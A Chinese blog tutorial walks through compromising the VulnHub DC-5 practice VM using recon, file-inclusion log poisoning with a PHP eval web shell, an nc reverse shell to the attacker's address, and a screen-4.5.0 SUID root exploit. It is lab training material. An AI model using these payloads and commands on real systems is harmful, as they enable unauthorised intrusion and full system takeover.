枫叶
枫叶
发布于 2026-07-27 / 8 阅读
0
0

【VulnHub】渗透学习——DC-5靶机导入和详细渗透教程

导入

下载完成后在Vmware中导入即可。

下载地址:

官方:https://www.vulnhub.com/entry/dc-5,314/

夸克网盘:https://pan.quark.cn/s/e6b5b7c6524a 提取码:1jJS

信息收集

老规矩,先扫描ip地址。靶机地址为192.168.31.106

nmap -sn 192.168.31.0/24 | grep "dc"
image-lJeF.png

接着扫描端口

nmap -sV -p- 192.168.31.106

开放了80、111、45476端口,其中80端口使用的是nginx的服务。

打开浏览器看看,发现并不是CMS站点,用dirserach扫描下站点目录。

dirsearch -u 'http://192.168.31.106/'

并没有发现什么东西。那咱们现在网页上找找有没有什么线索吧。

开始渗透

进入网页看看,发现“Contact”页面下面有输入内容框,咱们随便输入东西提交上去。

突然发现提交上去后页面下面的年份会随着每次刷新而改变。

联想到前面扫描站点目录时扫描到了/footer.php文件,咱们打开看一下

这不就是前面网页下面的年份吗,并且每次刷新还会变。

根据这些可以判断这个地方存在文件包含漏洞,需要咱们验证以下。

用bp抓一下提交数据成功后的那个网页,暴破一下找找是哪个变量能使用文件包含漏洞。

开始暴破,完成后筛选以下,发现可以用的是file。

试一下,看看能不能把passwd文件显示出来。

可以,并且看到了有个dc的用户,但是再无其他信息,无法登录这个用户,只能在这里想办法获取shell了。

前面不是发现有nginx服务吗,咱们可以利用nginx的日志文件,日志文件位于/var/log/nginx/error.log,先看看能不能读取出来。

可以,那咱们把一句话木马写道这个里面,然后用蚁剑去连接。

<?php @eval($_POST['cmd']); ?>

然后再次查看以下日志文件,看看有没有写入成功。

发现写入成功了,用蚁剑连一下试试。

接着进入蚁剑的虚拟终端,用nc反弹shell

先在kali的终端中输入 nc -lvvp 4444 进入监听模式

接着在蚁剑输入下面命令,ip地址是kali的地址,回车进行连接。

nc 192.168.31.201 4444 -e /bin/bash

接着用python生成一个可交互的shell

python -c 'import pty; pty.spawn("/bin/bash")'

找了一圈没见什么有用的文件,dc用户目录下也没有,那咱们就直接尝试提权。

提权

输入sudo -l看看,但是没有sudo。

看看系统的版本,找找有没有系统漏洞,但是试了一下不行。

再试试find / -perm -u=s -type f 2>/dev/null,看看有没有什么。

其中有个screen-4.5.0,这个可以用来提权。

把这个文件利用蚁剑上传到靶机中,然后给权限运行。

#先定位到上传文件的目录下
chmod +x 41154.sh
./41154.sh

运行后,成功获取root权限,接着去/root目录下面查看flag文件就行。

完成!


评论